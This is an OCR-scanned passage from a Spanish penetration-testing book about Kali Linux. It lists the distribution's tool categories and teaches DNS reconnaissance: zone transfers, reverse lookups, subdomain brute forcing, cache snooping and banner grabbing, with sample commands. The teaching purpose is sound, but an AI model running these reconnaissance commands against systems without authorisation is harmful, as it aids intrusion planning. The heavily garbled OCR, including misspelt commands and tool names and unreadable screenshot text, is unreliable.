Soporte  complete  para  MySQL,  Oracle ,  Posture  SQL,  Microsoft  SQL  Server,  Microsoft 
Access,  DB2  de  IBM,  SQLite,  Firebird,  Sybase  y  SAP  Max DB. 

-  Soporte  complete  para  seis  tecnicas  de  inyeccion  SOL:  boo  lean -based  blind,  time-based 
blind,  error- based  UNION  query,  stacked  queries  y  out-of-band. 

Estas  y  otras  caracteristicas  hacen  que  esta  herramienta  sea  indispensable  a  la  bora  de  realizar 
una  auditoria  web. 

*  Wires  hark:  Esta  aplicacion  es  un  analizador  de  paquetes  que  permite  examinar  datos  de 
una  red  viva  o  de  un  archivo  de  caprura  salvado  en  disco.  Analiza  la  infonnacion  capturada,  a 
traves  de  los  detalies  y  sumarios  por  cada  paqiiete.  Aunque  su  uso  docente  esta  muy  extend ido, 
Wireshark  no  solamente  se  enmarca  en  el  area  educativa.  ya  que  en  la  actual  idad  se  haconvertido 
en  una  herramienta  profesional  imprescindible  para  los  auditores  informal! cos. 


*  Zaproxy:  es  una  herramienta  f&cil  de  usary  que  fonna  pane  de  las  aplicaciones  de  uso  habitual 
en  et  proceso  de  pentesting  para  encomrar  vulnerabilidades  en  aplicaciones  web. 

Esta  diseftado  para  ser  utilizado  por  usuarios  con  diferente  nivcl  en  seguridad  y*  como  tal,  es 
ideal  para  desarrolladores  y  pro  bad  ores  ftmcionales  que  son  nuevos  en  el  hacking  etico,  ademas 
de  scr  un  conjunto  de  herramientas  muy  util  para  pentesters  de  nivel  avail  zado. 


Ademas  de  las  1 0  herramientas  antes  mencionadas,  sc  incluyen  mas  de  300  aplicaciones  que  realtzan 
diferentes  labores  como: 
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-  KccopilaciAn  de  InformaciAnu  A  su  vez  viene  dhridido  en  anilisis  de  DNS,  analisis  de 
ruteo,  an&lisis  de  telefoma,  analisis  de  trdfico,  anilisis  de  VoIP,  analisis  OSINT,  anilisis  SMB, 
analisis  SMTP,  analisis  SNMP,  analisis  SSL,  analisis  VPN,  deteeciAn  de  SO,  deteecion  de 
servicio,  escAner  de  redes,  identificacidn  de  host  en  linea,  identificaeiAn  de  IPS/IDS,  etcetera, 
habiendo  mas  de  100  herramientas  solo  en  este  apartado. 

-  Analisis  de  Vulnerabilidades.  Evaluacion  de  base  de  datos,  evaluaciAn  de  codigo  abierto, 
herramientas  Cisco,  herramientas  para  fuzzing,  OpenVas  y  otros  escaneres. 

-  Aplicaciones  web.  Aplicaciones  Proxy ,  aplicaciones  para  fuzzing,  escaner  de 
vulnerabilidades  web,  explotacion  de  base  de  dates,  identificacion  de  CMS,  Identificacion  de 
IDS/TPS  e  indexadores  WEB, 


Applications  Rjtti  [>-  I 
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■?J  Electronics 

A  Graphics 

internet 


h.,!ili  i  inui 


Office 
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>%  0«t«b«ie  Exploitation 

*  ^0  1 05/ IPS  Identification 
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>  Web  Application  i  ujfei  s 

M 

>  Weh  Application  Proxies 

>  ^0  Web  Crawlers 


Web  VulnprahiLii ,,  Scanners 


mmn 


Ourpsuite 
cadaver 
\  davtest 
debla^e 
Fimap 
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\  vega 
^  w3ar 
wapiti 
webscarab 
webshag  ’cli 
webshsg-gun 
webiploit 
whatweb 
w  psc  an 


Emagen  01-13:  Lisla  de  aplicaciones  disponibleS  para  audiiohas  web- 


-  Ataques  de  contrasefias.  Ataques  de  conextAn,  ataques  sin  concxiAn  y  herramientas  para 
GPU 

-  Analisis  Forense,  Antiforense  digital,  forense  digital,  analisis  forense  en  redes, 
herramientas  de  analisis  forense.  herramientas  forenses  de  antivirus,  herramientas  forenses 
de  hashes,  herramientas  forenses  de  recuperation,  herramientas  forenses  para  contrasenas, 
herramientas  forenses  para  im  dgen.es,  herramientas  forenses  para  PDF,  herramientas  forenses 
para  RAM  y  suite  de  analisis  forense. 
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Timgen  01.14:  Lisiade  aplkaciones  disponiblcs  paraanahsis  foreme. 


Herramientas  de  explotacion.  Ataques  Cisco t  base  de  dalos  de  exploits ,  herramientas  de 
ingenieria  social,  Metasploit  y  Network  Explot  at  ion 

-  Sniffing/envenenamiento.  Envenenamiento  de  redes,  herramientas  VoIP,  husmeando  la 
web,  husmeando  redes,  voz  y  vigilancia 

-  Acceso.  Herramientas  para  tuneles,  puertas  traseras  para  sistemas  operatives,  puertas 
traseras  para  web. 

-  ingenieria  In  versa.  Depurador,  desensamblador  y  otras  herramientas  de  ingenieria  in  versa. 

-  Pruebas  de  stress,  Pruebas  de  stress  para  redes,  pruebas  de  stress  para  VoIP,  pruebas  de 
stress  para  web,  y  pruebas  de  stress  para  WLAN, 

f  iaekeo  de  hardware,  Herramientas  Android  y  Herramientas  Aniuiim. 

-  I  i  errant  ientas  de  reporte.  Captnrador  de  meldios  y  gestion  de  evidencia. 

-  Servicios  del  sistema,  HTTP,  Metasploit ,  MySQL  y  SSH 


38 


Pentesting  con  Kali 


i 

-  Ataques  Wireless.  Herramientas Bluetooth ,  heiramientas  RFID  /NFC,  y  otras  herramienias 

Wireless. 


Imogen  01-15:  Lista  dc  aplicaciones  disponibles  para  aiiiques  Wireless. 


En  los  siguientes  capitulos  se  mostraran  con  mas  detai  le  algunas  de  estas  herramientas  y  su  aplicacion 
en  los  procesos  de  pentesting  en  el  mundo  profesionah 


Entre  algunos  dementos  a  destaear,  adeinas  dc  los  ya  mendonados.  se  encucntm  establecido 
fceweasel  1 8.0. 1  como  navegador  por  defecto. 


About  feeweasei 


Iceweasel 

18,0.1 

IceweaseL  is  designed  by  MoziUa,  a 

global  community  working  together  to  keep  the 

Web  open,  public  and  accessible  to  all 

Sound  interesting?  Get  involved! 


[magen  0! .  1 6:  Acerca  de  fceweasel. 
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Otro  element©  a  mencsonar  es  la  lista  de  repositories  que  puede  verse  en  L%/etc/apf/sourx  es,  I  is  f L ,  alii 
puede  afiadirse*  modificarse  o  elmiinarse  a  mano  In  localizacion  de  los  repositories,  Para  v  isuali/ar 
el  contenido  de  dicho  fiehero  es  posible  utilizar  el  sistema  que  results  mas  comedo. 

Para  termmar  $e  pude  acceder  a  una  de  las  herramientas  con  mayor  peso  en  Kali  Linux  y  no  es  otra 
que  Metmploit  Framework 

Si  no  se  encuentra  un  motor  de  base  de  datos  a!  eual  coneetarse  como  puede  ser  MySQL.  PostgreSQL, 
entre  otros,  el  framework  omite  ese  paso  y  guarda  todo  lo  necesario  para  su  ejecucion  en  memoria. 


Si  se  desea  guardar  informadon  de  algun  escaneo  realizado  desde  el  framework  como  las 
herramientas  Nmap  o  Ness  us  si  sc  debena  conectar  previamente  a  un  motor  de  base  de  datos.  Sin 
embargo  las  servicios  de  red  se  encuentran  deshah il dados  par  dejecta,  por  io  que  si  hacc  falta  Habra 
que  acti  varies  en  su  deierminado  momento. 

Metasploit  por  ejemplo  puede  usar  PostgreSQL  como  su  base  de  datos  por  lo  que  necesita  ser 
inidado  previamente. 


Todo  servicio  es  iniciado  con  la  sintaxis  “service  [N  ombre  dc  servicio]  start",  en  este  caso  para 
iniciar  el  servicio  de  PostgreSQL  deberia  teclearse  por  linen  de  coman dos  "service  postgresql start" 
lo  eual  iniciard  inmediatamente  dicho  servicio. 


Id  caso  de  que  se  desee  que  el  servicio  se  inicie  inmediatamente  con  el  equip©*  basta  con  hacer  use 
del  comando  “update-rad  [Nombrc_de_servicio]  enable". 


Una  vez  iniciado  PostgreSQL  lo  siguiente  sera  ej  ecu  tar  el  servicio  Metasploit  de  la  forma  antes 
men  cion  ad  a.  La  primera  vez  que  se  ejecute  el  servicio,  se  creara  un  usuario  de  base  de  datos  msfi  y 
una  base  de  datos  llamada msj3.  El  servicio  lambien  ejecutara  los  servidores  RPC  y  web  requeridos. 

Tras  realizar  los  pasos  previos  es  posible  iniciar  msfconsole  y  verificar  Sa  conectiv  idad  de  !a  base  de 
datos  con  el  comando:  dh  status 


Capitid°  IL  Recogida  de  information 
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Capitulo  II 

Recogida  de  informacion 


1.  Introduccion  al  Gathering 

Bn  la  introduccion  de  la  “Guia  lnteco  de  Seguridad  sobre  Information  Gathering”  se  constata  el  hecho 
por  el  ciiaL  el  exito  de  muchos  de  los  ataques  e  intrusiones  que  sufren  empresas  y  organ  izaciones  se 
debe  en  buena  medida,  a  la  cantidad  de  informacion  que  directa  e  indireetamente  un  atacante  es  capaz 
de  obtener  sobre  sus  sistemas,  Esta  fase,  en  la  que  un  atacante  intenta  recopilar  toda  la  informacion 
quo  sea  posible  sobre  su  objetivo,  incluyendo  aquella  que  de  manera  cormeiente  la  organization 
h&ga  publica  pero  sin  ser  consciente  de  las  implicaciones  que  de  el  I  a  se  pueden  deducir,  se  denumina 
reconnaissance  y  es,  sin  duda  alguna,  una  de  las  m&$  importantes  en  el  proceso  de  intrusibn.  Durante 
dieha  fase,  el  atacante,  haciendo  uso  de  diversas  tecnieas,  mas  o  menos  automatizadas,  obtiene 
informacion  de  la  infraestructura  de  red,  documenlos,  empleados,  etcetera  con  la  que  inas  adelante 
podt  a  llevar  a  cabo  un  ataque  mas  especifico. 

I  radicionalmente  el  proceso  de  recogida  de  i  nformacion  se  encuentra dividido  en  dos  fases.  La  primers 
details  el  procedim lento  seguido  para  recolectar  informacion  de  forma  externa  a  la  organ izac ion,  y 
se  denomina  External  Footprinting.  La  segunda,  se  centra  en  las  actividades  que  se  pueden  realizar 
una  vez  que  el  atacante  haya  conseguido  acceso  parcial  a  la  red  interna,  y  donde  intentara  volver  a 
conseguir  la  mayor  cantidad  de  informacion  posible,  para  seguir  escalando  el  ataque  a  otros  equipos 
dentro  de  la  organ  izac ion,  A  esta  segunda  fase  se  la  denomina  Internal  Footprinting  (este  concepto 
se  vera  como  parte  del  proceso  de  postexplotacidn), 

Para  la  estmetura  de  este  capitulo  se  va  a  seguir  el  planteamiento  propuesto  por  el  Penetration  Testing 
Execution  Standard  en  la  seccion  de  directrices  tecnieas.  En  cada  seccion  se  presentara  un  pequeno 
apanado  de  teorta  obtenida  de  diversas  fuentes  de  eonlianza,  y  se  comentara  el  fund  onam  lento  de 
aqudlas  herramientas  incluidas  en  Kali.  No  se  mencionaran  todas  las  herramientas,  puesto  que  se 
^'quei  ida  de  un  capitulo  o  incluso  un  libro  por  seccion,  pero  si  sc  detallaran  las  que  se  consideren 
Liiiles  o  sertcillas  en  cada  situation* 
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2.  External  Footprinting 

Del  m ism o  mode  que  el  proceso  de  recogida  dc  mformaci6n  esta  estructurado  en  dos  fases 
elaramente  diferenciadas,  a  su  vez  las  leenieas  de  recogida  de  iiiformacidn  desde  d  exterior  estan 
categorizadas  en  dos  subeategorias  en  liincion  del  grade  de  “agiesividad"  de  las  mismas,  Par  un 
lado,  esta  el  desCLibrimiento  active,  denominado  Active  Footprint  ng,  que  destaca  par  interactuar 
directamente  con  la  infraestructura  de  la  empresa  objetivo  mediante  consultas  al  DNS,  anal i sis  de 
las  cabeceras  HTT  P,  enumeracion  de  puertos  y  sus  servieios,  etcetera,  Y  por  otro  lado,  se  encuentra 
el  descubrimiento  pasivo.  I6gicamente  denominado  Pasive  Footprinting  que  recurre  a  la  consulta  de 
la  informacioti  previamente  indexada  por  motores  de  busqueda,  registros  publicos,  foros,  etcetera. 


Active  Footprinting 

Descubrimiento  DNS 

Cada  uno  de  las  equipos  con  saJida  directa  a  Internet  tiene  al  menos  una  direccion  IPasignada.  Para 
acceder  a  ellos  es  posible  hacerlo  especificando  dicha  direccion  IP  (###,###.###.###),  sin  embargo 
dicha  opeion  no  resulta  edmoda,  por  lo  que  es  preferible  recurrir  al  uso  de  nombres  de  dominio  o 
mas  espedficamente,  a  direcciones  FQDN  del  estilo  de  www. mis i tiaweb, es. 

Resulta  posible  asociar  nombres  en  lenguaje  casi  natural  con  direcciones  num^neas  gracias  a!  si  sterna 
denominado  DNS  (Sislema  de  Nombres  de  Dominio),  El  servicio  DNS  (Domain  Name  System )t 
cs  un  sistema  de  nomenelatura  jerarquiea  para  cualquier  recurso  conectado  a  Internet  o  a  una  red 
privada  DNS,  Eli  base  a  lo  comentado  anteriormente  se  puede  definir  como  un  servicio  esencial 
para  el  ftmeionamiento  de  las  redes  de  orden adores.  Los  sistemas  DNS  ofrecen  gran  eanlidad  de 
informacion  de  utilidad.  Este  servicio  simplifiea  el  acceso  por  parte  del  usuario  y  administradores 
a  los  servieios,  creando  una  capa  da  abstraction  que  enmascara  las  direcciones  de  red  con  cadenas 
de  textOj  que  son  mas  sene i] las  de  recordar.  Ademas,  por  regia  general,  los  nombres  de  los  sistemas 
suden  describir  la  funcidn  que  desempenan  para  ayudar  a  los  administradores  de  sistemas, 
desarToHadores  y  usuarios  finales  a  recordar  y  acceder  a  los  mismos  (caracteristica  tambien  utilizada 
por  los  atacantes  para  enumerar  posibles  servieios  ocultos).  Como  apunte  adicional  conviene  saber 
que  la  informacion  del  protocolo  DNS  es  almacenada  en  registios. 

A  continuation  se  ofrece  un  listado  de  los  registros  y  la  informacion  que  estos  almacenan: 

-  A  -  Address  ( Direccion)  Este  registro  se  usa  para  tradutir  nombres  de  hosts  a  direcciones 
IPv4. 

*  AAA  A  =  Address  (Direction),  Este  registro  se  usa  en  IPv6  para  traducir  nombres  de  hosts 
a  direcciones  IPv6, 

-  (  NAME  -  Canonical  Name  (Nombrc  Canon  ico).  Se  usa  para  crear  nombres  de  hosts 
adicionales,  o  alias,  para  los  hosts  de  un  dominio,  Es  usado  cuando  se  estan  eorriendo 
multiples  servieios  (como  ftp  y  servidores  web)  en  un  servidor  con  una  sola  direccion  IP 
Cada  servicio  tiene  su  propia  entrada  de  DNS  (como  ftp, ejemplo.com.  y  www.ejempto. 
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cohi)  Esto  tambien  es  utilizado  cuando  sc  ejecutan  multiples  servidores  http,  con  difercnies 
nombres,  sobre  el  mismo  host. 

-  NS  =  Name  Sewer  (Servidor  de  Nombres)  Define  la  asociacion  que  existe  entre  un 
nombre  de  dominio  y  los  servidores  de  nombres  que  almacenan  la  informacion  de  dicho 
dominio,  Cada  dominio  se  puede  asociar  a  una  cantidad  cualquiera  de  servidores  de  nombres. 

MX  (registro)  =  Mail  Exchange  (Registro  de  Intercam  bio  dc  Correo).  Asocia  un  nombre 
de  dominio  a  una  lista  de  servidores  de  intercambio  de  correo  para  esc  dominio. 

-  PTR  =  Pointer  (Jndicador).  Tambien  conocido  como  "registro  inverse',  funciona  a  ia 
in  versa  del  registro  A.  traduciendo  IPs  en  nombres  de  dominio. 

-  SOA  =  Start  of  Authority  (Tnieio  de  autoridad).  Proporciona  informacion  sobre  el  servidor 
DNS  primario  de  la  zona. 

-  HINFO  =  Host  Information  (Informacion  del  equipo).  Description  del  host,  permite  que 
la  gente  conozca  el  tipo  de  niaquina  y  el  sistema  operative  al  que  corresponds  un  dominio. 

-  TXT  -  Text  (Informacion  textual),  Permite  a  los  dominies  identificarse  de  modes 
arbitrarios. 

-  LOC  =  Location  (Localizaeion),  Permite  indicar  las  coordenadas  del  dominio. 

WKS.  Generalization  del  registro  MX  para  indicar  los  servicios  que  ofrece  el  dominio. 
Esta  obsoleto  en  favor  de  SRV. 

-  SRV  =  Services  (Servicios),  Permite  indicar  los  servicios  que  ofrece  el  dominio,  RFC 
2782, 

-  SPF  =  Sender  Policy  Framework  (Marco  de  Directives  de  Remitentc),  En  este  registro  se 
e spec ifi can  los  hosts  que  estan  autorizados  a  enviar  correo  desde  el  dominio  dado. 


En  base  a  todo  lo  anterior  se  puede  apreciar  como  el  servicio  DNS  resulta  fundamental  durante 
el  proceso  de  Information  Gathering  gracias  al  cual  se  puede  generar  un  primer  mapa  de  la 
infraestructura  de  red  objetivo. 

Kali  dispone  de  una  docena  de  herramientas  relacionadas  con  la  recogida  de  information.  A 
continuation  se  presents  el  listado  de  dichas  herramientas: 


1 .  dnsdict6. 

2.  dnsemim. 

3.  dm  map. 

4.  dmrecon. 


5.  dusrevenumd. 

6.  dns tracker. 

7.  dns  walk, 
fierce. 


9.  malt  ego, 

1 0.  nmap. 

1 1 .  urlcrazy. 
1 2  zenmap. 


Las  primeras  7  herramientas  estan  enfocadas  exclusivamente  en  obtener  informacion  dc  los 
servidores  DNS,  el  rcsto  pueden  ser  conskieradas  como  mas  genericas  no  enfocadas  exclusivamente 
a  obtener  informacion  a  traves  de  este  medio. 
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A  continuadon,  se  muestran  las  distintas  tecnicas  de  enumeraddn  de  informacion  en  la  que 
intervienen  los  servidores  DNS  y  que  herramientas  de  las  anteriores  sc  pueden  utilizar  para  recabar 
dieha  informaci6n* 


Transferenda  de  Zona 

La  transferencia  de  zona  es  el  term  i  no  utilizado  para  referirse  al  proccso  por  el  eual  se  copia  el 
conienido  de  un  archive  de  zona  DNS  de  un  servidor  DNS  principal  en  un  servidor  DNS  secundario. 

Las  transferences  de  zona  siempre  son  iniciadas  por  el  servidor  DNS  secundario.  El  servidor  DNS 
principal  simplemente  responde  a  la  soliicitud  de  una  transferencia  de  zona,  El  servidor  primario 
debe  filtrar  por  direcdon  IP  que  servidores  secundarios  pueden  realizar  dichas  transferencias.  En 
los  casos  en  los  que  estos  no  se  encuentran  correeiamente  eonfigurados  es  posible  obtener  todas  las 
zonas  de  los  dominios  que  administra  el  DNS. 

El  procedimiento  manual  para  conseguir  la  transferencia  de  zona,  consiste  en  ejecutar  nslookup, 
buscar  un  servidoT  DNS  autoritativo  que  sea  publico  v  pedirle  un  volcado  de  todas  las  direcdones 
DNS  almacenadas. 


Kn  Kali  una  de  las  herramientas  que  pe finite  realizar  este  procedimiento  de  manera  automat  izada  es 
cimetwnt.  Con  el  comando  dmenurn  ciomimo  web,  se  ejecuta  de  manera  automatizada  un  analisis 
sobre  el  sitio  web  buscando  servidores  con  la  transferencia  de  zona  habilitada  y  realiza  el  volcado. 


H  jl  I  L  Lt  ' 


drt4|f  V+r  TxnwftWt  Ayi.wl» 


nsF  •  =s 


r  ■  i  ill  k  i*  u  ji  dhssnui" 
tins an urn  [i i  VERSION :1 .2,2 


Host's  -ulttf  r  ^  : 


Name  Senrers; 


ns  .4 


s-s 


I7Z2 

1773 

20269 


IN  A 

IN  A 

IN  A 


Mail  IRK)  Servers: 


s rlf  *  ‘Hi 


l  ■  v  J  rnj  /win*  I  roivU  rfo  And  getting  14 Old  UervliiHs- 


Trying  Zcin«  Transfer  for 


m  d«  ,  + , 

172000  IN  50 A 

172000  IN  TXT 

172600  IN  m 

I.72B80  IN  NS 


141 


Imogen  02.01:  KjempJo  del  mo  de  b  herrarmen tadnsemm. 


Dando  coino  resultado  un  Ustado  con  iodos  los  equipos  de  la  organ izacion. 
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ro  i.IgH  alirn  ■ 

Art  pin*  fsjitJi  V91 

CLflUJ 

f  MiBfimuii 

A  -  ydu 

■  H 


-  r 


1729M 
i7?*m 
lrcene 
172990 
]7J8fl<5 
]7?Bfl3 
172W9 
172333 
3  72fr3G 
1/2303 
1 72B33 
172099 
1 72030 
172903 
172B3& 
L72B0G 
L 72900 
1 72899 
17290© 
17200© 
1 7299S 
17290© 
llj 


1M 

lh 

TN 

IN 

id 

Id 

id 

IH 

l*f 

Id 

id 

Id 

Id 

IN 

IN 

IN 

IN 

IN 

7N 

IN 

IN 

TN 


m 

NS 

NS 

NS 

NS 

N5 

NS 

NF 

k 

HI  NFC 
k 

HENP0 

A 

HI  INFO 

A 

FINFO 

A 

A 

-INFO 

HlfctfQ 

A 

Hi  NFS 


IV  ■“  17 

lriL  m*  W*  ■'■0$ 

15  il 

iv-  ™  *•  a 
i «  n 

15  is  i 
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■i© 


i 72390 
i7?a©e 
i 72830 
172800 
177999 
i 72990 
1 72900 
172B&0 
17280(0 


HIMFO 

A 

A 
A 
A 
A 
A 
A 
A 


Imagen  02,02  'i  ransfercricia  de  zona  realizada  con  herramieuta  tfasenum. 


Resolution  Inverse 

La  resolucidn  DNS  mas  cornun  es  la  creada  para  traducir  un  n ombre  para  una  direction  IP,  sin 
embargo  esc  no  es  el  unico  tipo  de  resolution  DNS.  Tambien  cxiste  la  denominada  resolution 
inversa,  que  haee  la  traduccion  de  una  direeeion  IP  a  un  nombre. 


En  siis  inicios  ia  resolucion  inversa  se  utilizaba  como  mecanismo  auxiliar  de  seguridad  para  los 
servidores  en  Internet,  comparando  los  resultados  de  una  resolucion  inversa  contra  la  resolucion 
directa  del  nombre  para  direeeion  IP.  En  el  caso  de  los  resultados  iguales,  se  permitia,  por  ejemplo, 
el  acceso  remoto  al  servidor. 


Para  la  resolucion  inversa  fueron  creados  nombres  de  dominio  espedales:  in-addrarpa  para  bloques 
IPv4  e  ip6.arpa  para  bloques  IPv6. 

Para  pouer  la  direeeion  IP  dentro  de  lajerarquia  de  nombres  DNS,  es  necesario  hacer  una  operation 
encargada  de  crear  un  nombre  que  represente  la  direeeion  IP  dentro  de  dicha  estructura. 


En  lajerarquia  de  nombres  del  sistema  DNS  la  parte  mas  a  la  izquierda  es  la  inas  especifica  mientras 
que  ia  parte  de  la  derecha  es  considerada  la  menos  especifica.  Sin  embargo.  La  numeration  de 
direeciones  IP  se  realiza  al  reves,  es  decir,  lo  mas  especffico  queda  mis  a  la  derecha  en  la  direccidn 
I  P,  lo  ami  impliea  que  para  resol verlo  se  deha  hater  una  operacion  que  inviem  eada  parte  de  la 
direeeion  IP  y  luego  aftada  el  nombre  de  dominio  reservado  para  la  resolucion  inversa  (in-addr.arpa 
o  ip6,arpa) 

Por  ejemplo,  considerando  la  direeeion  IPv4  10.0,0,  L  Para  colocarla  en  el  formato  necesario,  se 
debe  invertir  eada  byte  y  ariadir  el  dominio  para  resolution  inversa  al  final:  I.OJ)  1  OAn-addnorpa. 
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Tcniendo  en  cuanta  la  idea  anterior  es  posible,  si  se  cornice  el  rango  de  direcciones  IP  del  dominio  a 
auditar.  pregunlar  por  cada  uno  de  I  os  registros  PTR  asociados  a  cada  direccion  IP  y  en  luncion  de 
la  respuesta  obtenida  realizar  la  enumeracion  de  todos  los  equipos,  I 

A  continuacion  se  presenta  un  caso  de  ejemplo  en  el  que  se  analiza  un  pequefio  rango  IP  de  ft 
direcciones; 


rauJtgptalic#  - 

4 f rhi -  t  r  i*  v>i  hu-.  *  Tr  nr-i|  ,  1,1ft 


'  ■  '  '  -*  onsrBCDft.py  r  Ifff  jp  p  *83  -  11H  tto  sr 

1*1  LaaK  up  of  a  flanges 

1*1  nerFonaing  Rayonw  L&okup  r f o-fl  l«i  m  »4  i!  tn  lift  *m  ■  «*g 

1*1  PTR  flh  -  Jg2 4*0  pur.?*'  v  tA  I  :  -  .w  jog 

1*1  PiR  1KMHB7 

[-]  PTR  ah  aC.uk  lfe  m  ft  104 

1*1  PTR  ah  •  -j  m  •  pe.uk  19.-  ■  £3 

["}  4  TleC-OfttE  Found 

raul|ltalii  •  :~t 


gmlo  aocaoDn  i 

Imagcn  02,03  Realization  de  DNS Bruning  c(m  l;i  hemimienta  dn&recon. 


Adenitis  a  mode  de  ejemplo,  en  Nmap  i  zenmap,  y  sin  intencion  de  profundizar  en  d  mancjo  de  3a 
herramienta,  es  posible  ejecutar  el  eomando  nmap  -sL  y  pasarle  el  rango  de  direcciones  IR  con  lo 
que  se  obtendria  un  resultado  similar: 


Imagen  02.04  SimulaciAn  de  DNS Brttitm#  con  la  hemimicnta  zenmap. 


DNS  Bruiting 

Consisle  en  la  utilizaeion  de  un  diecionario  para  in  ten  tar  enumerar  medianle  fuerza  bruta  nombres 
de  subdominios  existentes  bajo  el  dominio  principal  de  la  organizacicm.  El  procedi  mi  ento  se  basa  en 
observar  las  respuestas  del  servidor  DNS  ante  una  petition  valida  y  las  respuestas  ante  una  direccion 
no  existente. 
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j-n  Kali.  adcmSs  de  con  el  comando  explicado  para  la  trasferencia  de  zona  en  la  que  se  puede 
especificar  un  diccionario  de  origen,  los  comandos  dnsdictd  y  dnsmap  tambien  son  validos.  Los 
comandos  a  uttlizar  en  cada  uno  de  los  casos  serfan  los  siguicntes: 

-  dmenum  dominie  -f  diccionario 

-  dnsdict6  dominio  / dmdict6  dominio  diccionario 


ifpoipkjtk*  ” 

Arch  mo  i_d(!  i-:  V*f  Buuiyi 

•  .•  i  !i 

m  ASM 


;r  ’  :»j  K  .J 1  d-"!SdlEt6  -04  -1  -t  ? 

Starting  i?N5  wnumergrlan  w nrW  on 
Gathering  NS  ond  MX  infomaticn. . . 

ns  f  -P.  Ai  *  w  h  ■  -tfS 

af 

to  IPv6  address  for  NS  entries  found  in  DNS  fordmi^ 
to  IPv6  address  far  MX  entries  found  in  DNS  for  douW! 


.5, 

■5. 


Starting  eni.imfiHjri.rig  uam.es  C'eutlng  2  threads  for  1413  words,,  , 
-sti-aced  time  to  completion:  3  to  6  minutes 
15'-.?“ 


immm 


Imogen  (1-2.05  Ijecnplo  del  iimhIc  t|  bcmimicnUi  tinstiu'ff}. 


dnsmap  dominio  f  dnsmap  dominio  -w  diccionario 


dnsmap  il 

tins map  Q.33  DNS  Network  Mapper  by  pagvsc  fgnucjstizen^or^ 


f searching  ( sub 3  domains  for  *  M  using  built  in  wordlist 

r+i  using  maximum  random  delay  of  millisecond^ s]  between  requests 


9il 

IP  address  #1 :  15*? 


IP  address  #1 : 


m 


IPv6  address  #1 : 
IPv6  address  #2: 


I* 

TP  address  # 1 : 
IP  9ddr*si  12- 
IP  address  f3: 
IP  iddreas 


iff-;  jMM  CS 

IP  add rostf,  «L  :  15  _  if 


Imagcii  02.1)6:  Ejcmpto  del  uso  de  la  herramientu  dnsmap. 


I  cl  caso  del  dmdicti S  y  del  dnsmap  se  puede  apreciar,  por  los  comandos  expuestos,  que  ambos 
He  van  un  diccionario  integrado  con  los  nombres  de  subdominios  mas  com  lines*  En  caso  de  querer 
US£*r  un  diccionario  externo  mas  complete,  aparte  dc  construirse  uno  persona!,  en  la  web  de  Google 
Code  del  proyecto  de  dmenum  se  encuentra  dispersible  un  “pequefio”  diccionario  de  3,6  MB. 
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DNS  Cache  Snooping 

La  cache  DNS  tiene  el  ml  de  traductor  de  direcciones  URL  a  direcciones  IP  y  vice  versa,  Es  el 
servicio  habitual,  los  proveedores  de  servicios  de  internet  genera  I  men  te  suministran  varies  a  sus 
elientes.  De  esta  forma  cuando  un  equipo  necesita  traducir  nombres  a  direcciones  IP  se  recurre  a 
estos  servidores, 

Cada  vez  que  un  usuario  quiere  resolver  un  nombre  de  dominio,  este  pregunta  al  servidor  DNS  que 
tiene  configurado.  Si  se  encuentra  activada  la  cache,  antes  de  solicitor  la  resolution  por  medio  de  un 
sistema  de  consultas  reeursivas.  mirara  primero  si  tiene  una  resolution  valida  de  ese  nombre  en  su 
cache.  Si  io  tiene.  devolvera  esa  entrada.  En  caso  contrano,  comenzara  el  sistema  de  resolution  DNS 
recursiva  y,  una  vez  resuelto,  almacenara  en  la  cache  el  resultado  y  lo  devolvera. 

En  base  a  este  funeionamiento.  si  se  quiere  saber  si  se  ha  resuelto  un  determ  iriado  dominio 
recientemente.  es  suficiente  con  eonfigurar  las  consultas  al  servidor  DNS  desactivando  la  resolucidn 
recursiva  de  las  mismas.  Es  deeir,  eonsultando  solo  la  cache  del  DNS.  Si  sc  ha  pedido  en  un  liempo 
reciente  se  obtendra  la  resolucion,  mientras  que  si  no  se  ha  solicitado  se  obtendra  una  respuesia 
negativa  de  resolucion. 


Una  de  las  uttlidades  a  usar  para  explotar  esla  funcionalidad  es  dnsrecon,  y  el  conrando  a  utilizar 
seria  cl  siguiente: 

-  dnsrecon. py  -t  snoop  -n  serv  idor  dns  -D  listado  webs 


A  continuacion  una  eaptura  a  modo  de  ejemplo: 


f pot @1  .ilic  o  “ 

Archivo  Edrtai  vvr  Bu:  ir  T^rrmrut  -kuda 


rootiakal  kr  :-#  dnsrecon. py  -t  snoop  -n  as  -D  Desktop/dominios 

[*]  Performing  Cache  Snooping  against  NS  Server:  213 . 144.49 .35 


Name:  www.google.com.  TIL:  43  Address: 

Name:  www.google.com.  TTL:  43  Address: 

Name:  www.google.com.  TIL:  43  Address: 

Name:  www.google.com,  TTL:  43  Address: 

Name:  www.google.com,  TTL:  43  Address: 

Name:  www.ingdirGct.es.  TTL:  167543  Address:  1! 


; ' 

V- 

k-; 

:-;i  x 

- 

root^kalico :~#  | 


42  Type: 


4Q  Type: 
41  Type: 


*2  Type:  A 


J  m age n  02.07:  Reali/ad6n  de  DNS  Cache  Snooping  con  la  herramienta  dnsrecon. 


Banner  Crabbing 

I  no  de  las  igcnicas  utilizadas  a  la  hora  de  realizar  controles  sobre  una  aplicacion  web  es  la 
informaddn  que  puede  obtenerse  a  traves  de  los  banner  que  ofrccen  los  servicios.  Este  coneeplo 
se  ref  i  ere  a  la  interaction  manual  en  texto  piano  para  obtener  informacidn  sobre  el  servidor  donde 
reside  la  aplicacion  web. 

El  banner  grabbing  es  una  de  ias  tecnicas  mas  simples  para  conocer  que  infraestructura  o  sistema  se 
encuentra  detras  de  una  aplicacion  web  o  servicio,  En  otras  palabras,  esta  estrechamente  relacionado 
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con  el  fingerprinting  para  detcctar  ei  sisiema  operative,  Por  ejemplo,  en  los  servidores  HI  TP 
existen,  entre  ottos,  tres  tipos  de  servidores  mayoritariamente.  los  servidores  Internet  Information 
Services  que  corre  sobre  el  sistema  operative  de  Microsoft  Windows  Server^  los  servidores  Apache , 
que  genera  Imente  corren  sobre  Linux,  y  los  servidores  Nginx,  que  Iambi  cn  corren  sobre  Linux,  V  en 
los  tres  casos  la  respuesta  ofreeida  por  el  servidor  casi  siempre  incluye  los  terminos  “IIS",  “apache" 
y  “nginx"  respectivamente. 

fCali  ofrece.  entre  otras,  la  herramienta  near ,  herramienta  considerada  conio  la  evolucion  de  N etc  at 
y  posee  una  seric  de  fund  on  alidades  que  la  hacen  mas  sencilla  a  la  bora  de  utilizarla.  No  obstante, 
aun  es  posible  ejecutar  Netcai  enviando  un  mensaje  sin  contenido  a  eada  uno  de  los  puertos  de  la 
direccion  IP  del  servidor  a  auditar. 


